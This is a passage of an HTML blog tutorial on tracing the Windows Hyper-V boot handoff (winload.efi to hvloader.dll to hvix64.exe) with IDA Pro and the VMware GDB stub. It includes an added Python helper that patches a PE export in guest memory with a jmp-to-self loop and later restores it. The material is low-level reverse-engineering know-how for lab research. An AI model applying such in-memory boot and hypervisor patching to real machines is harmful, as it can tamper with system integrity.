font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">-></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Enable secure boot</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">) and boot winload.efi again.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Set monitor.debugOnStartGuest64 = "TRUE" in the .vmx configuration file, start the VM and attach the winload.efi database to the VMware GDB stub: you break immediately after the VM starts running, with the breakpoint saved in the database still in place.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-left: 35.4pt; margin-top: 0pt; text-align: justify;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span 
style="border: none; display: inline-block; height: 79px; overflow: hidden; width: 225px;"><img height="79" src="https://lh4.googleusercontent.com/O3Otf6mfoToFoFe72kQaZss-Prk0ETZuhoWh2I3RtZZ3MunE605OegOxmniab6rcu0QgtT1KwF4TUwAKX7H_nKDgL-RhtluSRBCqDucwOHiOfZ9VvQIJr7801zHJoyVPLHv464wfukBmSoROAg" style="margin-left: 0px; margin-top: 0px;" width="225" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Next, press F9 and wait, until you stopped on </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslArchHypervisorSetup</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> again. 
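<br /><br />The hand-off between the two IDA databases described above (PatchHvLoader2019.py parks the CPU at the start of HvlLoadHypervisor, RestoreHvLoader2019.py puts the original bytes back after the rebase), as an added example that is not the page's scripts: it resolves an hvloader.dll export by walking the PE export table in guest memory, the way winload resolves HvlLoadHypervisor and the other exports listed above, writes the EB FE loop over the first two bytes, and keeps the original bytes and addresses as JSON so that the other database can restore them. The image, its base address (0x00E70000) and the FakeMemory backend are constructed for the example; IdaDebuggerMemory assumes IDAPython's ida_idd.dbg_read_memory / dbg_write_memory and is only used inside IDA.

```python
"""Park-and-hand-off helper: an added example reproducing the idea behind the page's
PatchHvLoader2019.py / RestoreHvLoader2019.py scripts (it is not those scripts). It resolves
an hvloader.dll export from the PE export table in guest memory, overwrites its first two
bytes with EB FE (jmp short $) so the vCPU spins there, and keeps the original bytes in JSON
so the *other* IDA database can undo the patch after Edit->Segments->Rebase. FakeMemory and
the image are constructed for the example; the IDAPython adapter at the end is an assumption."""
import json

JMP_SELF = b"\xEB\xFE"   # jmp short -2: loops forever at the patched address

def _le(value, size): return value.to_bytes(size, "little")

class FakeMemory:
    """Constructed stand-in for guest memory: one image at a fixed base in a bytearray."""
    def __init__(self, base, image):
        self.base, self.buf = base, bytearray(image)
    def _off(self, ea, n):
        off = ea - self.base
        if off < 0 or off + n > len(self.buf):
            raise IndexError("access outside image at %#x" % ea)
        return off
    def read(self, ea, n):
        o = self._off(ea, n)
        return bytes(self.buf[o:o + n])
    def write(self, ea, data):
        o = self._off(ea, len(data))
        self.buf[o:o + len(data)] = data

def _u16(mem, ea): return int.from_bytes(mem.read(ea, 2), "little")
def _u32(mem, ea): return int.from_bytes(mem.read(ea, 4), "little")

def find_export(mem, image_base, name):
    """VA of a named export of the PE32+ image at image_base (as winload does for hvloader)."""
    pe = image_base + _u32(mem, image_base + 0x3C)           # IMAGE_DOS_HEADER.e_lfanew
    if mem.read(pe, 4) != b"PE\0\0":
        raise ValueError("no PE signature at %#x" % pe)
    opt = pe + 0x18                                          # IMAGE_OPTIONAL_HEADER64
    if _u16(mem, opt) != 0x20B:
        raise ValueError("not a PE32+ image")
    exp = image_base + _u32(mem, opt + 0x70)                 # DataDirectory[EXPORT].VirtualAddress
    n_names = _u32(mem, exp + 0x18)                          # IMAGE_EXPORT_DIRECTORY.NumberOfNames
    funcs, names, ords = (image_base + _u32(mem, exp + o) for o in (0x1C, 0x20, 0x24))
    for i in range(n_names):
        p, cur = image_base + _u32(mem, names + 4 * i), b""
        while mem.read(p + len(cur), 1) != b"\0":            # NUL-terminated ASCII name
            cur += mem.read(p + len(cur), 1)
        if cur.decode("ascii") == name:
            return image_base + _u32(mem, funcs + 4 * _u16(mem, ords + 2 * i))
    raise KeyError(name)

def park(mem, image_base, export):
    """Patch `export` with jmp $ and return the state another database needs to undo it."""
    ea = find_export(mem, image_base, export)
    saved = mem.read(ea, len(JMP_SELF))
    if saved == JMP_SELF:
        raise RuntimeError("%s is already parked" % export)
    mem.write(ea, JMP_SELF)
    return {"image_base": image_base, "export": export, "ea": ea, "saved": saved.hex()}

def restore(mem, state):
    """Undo park(); refuses to write if the bytes at ea are no longer our patch."""
    ea = state["ea"]
    if mem.read(ea, len(JMP_SELF)) != JMP_SELF:
        raise RuntimeError("patch not present at %#x; not overwriting" % ea)
    mem.write(ea, bytes.fromhex(state["saved"]))
    return ea

def dump_state(state): return json.dumps(state)   # text of the sidecar file shared by both databases
def load_state(text): return json.loads(text)

def build_fake_hvloader():
    """Constructed minimal PE32+ image exporting HvlLoadHypervisor and HvlLaunchHypervisor."""
    img = bytearray(0x3000)
    img[0:2], img[0x3C:0x40] = b"MZ", _le(0x80, 4)           # IMAGE_DOS_HEADER with e_lfanew
    pe, opt = 0x80, 0x98
    img[pe:pe + 4] = b"PE\0\0"
    img[pe + 4:pe + 24] = _le(0x8664, 2) + _le(1, 2) + _le(0, 4) * 3 + _le(240, 2) + _le(0x2022, 2)
    img[opt:opt + 2] = _le(0x20B, 2)                         # PE32+ magic
    img[opt + 0x70:opt + 0x78] = _le(0x1000, 4) + _le(0x200, 4)   # export data directory
    funcs, names, ords, text = 0x1040, 0x1050, 0x1060, 0x1100
    exports = [("HvlLoadHypervisor", 0x2000), ("HvlLaunchHypervisor", 0x2100)]
    img[0x1014:0x1028] = b"".join(_le(v, 4) for v in (len(exports), len(exports), funcs, names, ords))
    for i, (nm, rva) in enumerate(exports):
        img[funcs + 4 * i:funcs + 4 * i + 4] = _le(rva, 4)
        img[names + 4 * i:names + 4 * i + 4] = _le(text, 4)
        img[ords + 2 * i:ords + 2 * i + 2] = _le(i, 2)
        img[text:text + len(nm) + 1] = nm.encode() + b"\0"
        text += len(nm) + 1
        img[rva:rva + 4] = b"\x48\x89\x5C\x24"               # mov [rsp+8], rbx: a typical prologue
    return bytes(img)

try:  # ASSUMED IDAPython adapter: only importable when this runs inside IDA's debugger
    import ida_idd
    class IdaDebuggerMemory:
        def read(self, ea, n): return bytes(ida_idd.dbg_read_memory(ea, n))
        def write(self, ea, data): ida_idd.dbg_write_memory(ea, bytes(data))
except ImportError:
    pass
```

Inside IDA you would construct IdaDebuggerMemory() instead of FakeMemory, call park() from the winload.efi database and write dump_state() to a file next to the databases, then, from the hvloader.dll database once it has been rebased to image_base, call restore() with load_state(). The check in restore() that EB FE is still in place guards against writing the saved bytes into a database that was rebased to the wrong address, or into a guest that has already moved on.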
</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Winload.efi!BlSiHandleHypervisorLaunchEvent</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, next </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslArchHypercallSetup</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. End of </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!VlpSetupPhase0</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. 
Further bootloader make initialization of disks (including vhd in case of boot-from-vhd option), make UEFI initialization (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!BlHSTICallProviders</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), make initialization code integrity policy (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslInitializeCodeIntegrity</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">), </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslFwProtectSecConfigVars</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslpProcessEVStore</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: 
none; vertical-align: baseline;">.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Go to </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!VlpSetupPhase1</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. It calls early found </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader!p_HvlRescindVsm</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">. 
Then </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslExecuteTransition</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> calls </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!VlpSetupLaunchPhase</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> again; this time </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">winload!OslArchHypervisorSetup</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> takes a different path and executes </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">hvloader.dll!p_HvlLaunchHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">Hvloader.dll!HvlLaunchHypervisor</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> executes </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootlib!BlGetExecutionEnvironment</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> and </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">bootlib!OslLoadMicrocodeUpdate</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, and then jumps to the hypervisor entry point (in a subprocedure):</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 223px; overflow: hidden; width: 176px;"><img height="223" src="https://lh4.googleusercontent.com/54MWQkX-DhQHB-z8rGDbFyA_cZHgINWAttdIIQgQCO2k5lJDhyXk8OTnPevleiJ7MCobzNLJs4PObIUk--GGPRC76D4GoRVrTd35geuMqiupaodaOaWt90lES8ztqXqn9l-K0sr2f8jsZRurfQ" style="margin-left: 0px; margin-top: 0px;" width="176" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 39px; overflow: hidden; width: 179px;"><img height="39" src="https://lh3.googleusercontent.com/J2arRNO1WEW9hrxUrC-Czh4XfEiuVEb3r4OK2yJCT7N5h_IOzII-7k9_N4cminmG-AOcHpC6qz2iNUG0kD6V2hiJBSkOe8iQTzMKWI1QL305p64STiKzdseBYHwV4XRT6C8jIx66LPNqSXYuiw" style="margin-left: 0px; margin-top: 0px;" width="179" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mov cr3, rcx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction we immediately see that addresses above 0x3000 are now empty (the page mapping has changed).</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 36px; overflow: hidden; width: 267px;"><img height="36" src="https://lh3.googleusercontent.com/EKitQDvVgJziCJ8XPblb94nI5zWPss6810FvcPDr1fgJYwdJB7hOZtcjpNVxn9gGAQWJV-lBVrvsuYoJN-i9g_e9e0Jp_XOo98osFYdPtC11AoF6jzD1EyoXrTAO-O_ilLg6NkYmM1GjSuGkSw" style="margin-left: 0px; margin-top: 0px;" width="267" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Hvix64.exe is already in the 64-bit address space. 
To read memory from it we need to create a debugger segment: Debugger option -> Manual memory regions.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 161px; overflow: hidden; width: 178px;"><img height="161" src="https://lh4.googleusercontent.com/Pm-KrNPvqrRCRHUb4isidzoDHS9glgRlFmBIA7oQpEyP_cdyAZlMDXrL9MDuaF0Er-x4AGXKjP8bXDzoZb9dUw3l_W3YxEf_eZ_OXCf6f9KCJijVtJ9rYhMhTHGX08WS9sYRF5Z40CuPBP78SQ" style="margin-left: 0px; margin-top: 0px;" width="178" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: center;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 223px; overflow: hidden; width: 377px;"><img height="223" src="https://lh6.googleusercontent.com/6XGACv5c58ggJcKsPt8IHg-LQwurnqKLXuelb8LZ54BX_L0notPd_Yn2EU3NhE-YpVT4ibWQnLhhDu-q_S_b6MigQ7gV-uqEJ_Zp8c_SVIyWFCpVldZIyhUVDRJFrXD8FwacdNjUWJGBDz_k_w" style="margin-left: 0px; margin-top: 0px;" width="377" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Start address: 
FFFFFB0000000000</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">End Address: FFFFFCFFFFFFFFFF</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">You can set a wider range (e.g. 0-0xFFFFFFFFFFFFFFFE) if the debugger doesn’t show warning messages. Launch the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">PatchHvix64_2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script when you are on the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">jmp rdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">rdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> in the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">jmp rdx</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> instruction points to an address range outside the manual memory regions, IDA PRO hangs.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Close the hvloader.dll database, open the hvix64.exe database and attach it to the VMware GDB stub. 
Launch the </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">RebaseHVGdb2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script, then </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">RestoreHvix64_2019.py</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, which restores the instruction replaced earlier.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">We are inside hvix64.exe.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.2; margin-bottom: 3pt; margin-right: 7.2pt; margin-top: 0pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span class="Apple-tab-span" style="white-space: pre;"> </span></span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 10.5pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 227px; overflow: hidden; width: 256px;"><img height="227" src="https://lh4.googleusercontent.com/areYGuRRAT-J2x9f-kzLhTY43SZDVQD7lGsBSono66YCzqoMql-4A0qi3690C5JI4jH0bpxTmzUYQAP9eDazE8BlNTCy9fVAFf8JrXc8y4B5_X18FWVUwI-YXmJb0uL8XYO4HZDOSJN9vZvAVw" style="margin-left: 0px; margin-top: 0px;" width="256" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 180px; overflow: hidden; width: 587px;"><img height="180" src="https://lh3.googleusercontent.com/I4LU09G58ntxe142ZCaOPKg2xYTOaVxoD_wqvSNn4SazB-QErK4amnWLQmauBSUthQd2V6T0qHBiID_WJ5absoHk7st1O6MCJXiwP6o89u0fg3jl9heQZ8-LdAy-u5PsWBG-_FK0STWWa_Y6nw" style="margin-left: 0px; margin-top: 0px;" width="587" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 94px; overflow: hidden; width: 501px;"><img height="94" src="https://lh3.googleusercontent.com/RaOUogTmtPkMWb4v20YzOjfvq1aYlLA63xwF73Ufe5fuLxEsPnz4eQ-PjIQ-6dfFzwTZlup3pt0H7rW1v9kTfr6aTGm8w6MrMAAuIrbEQTdzggYjOWXNcRua_KprZuPXUgBq0eL741nS6j9OVg" style="margin-left: 0px; margin-top: 0px;" width="501" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">After </span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">vmlaunch</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> we return to hvloader.dll and then to winload.efi.</span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: center; text-indent: 35.45pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><span style="border: none; display: inline-block; height: 218px; overflow: hidden; width: 315px;"><img height="218" src="https://lh3.googleusercontent.com/a7IpQju-XBlQBXx0ziGkT-Dvzo5c4SAHJbggOTik8vVkwSK3NCY0R-isbxAVx1rVTiKceiRYmsGvN_tNQZden9-DpOaubKrzi8RvvgUjab_EUxPBGypDDIczjty9wPUOGX-0Ig4BopdaXgllqA" style="margin-left: 0px; margin-top: 0px;" width="315" /></span></span></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><b style="font-weight: normal;"><br /></b></p><p dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;"><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">If you want to debug the OS loader, simply don’t patch hvix64.exe and set a breakpoint on the instructions after the VM exit (</span><span face="Calibri,sans-serif" style="background-color: transparent; color: black; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">mov eax, 1</span><span face="Calibri,sans-serif" style="background-color: 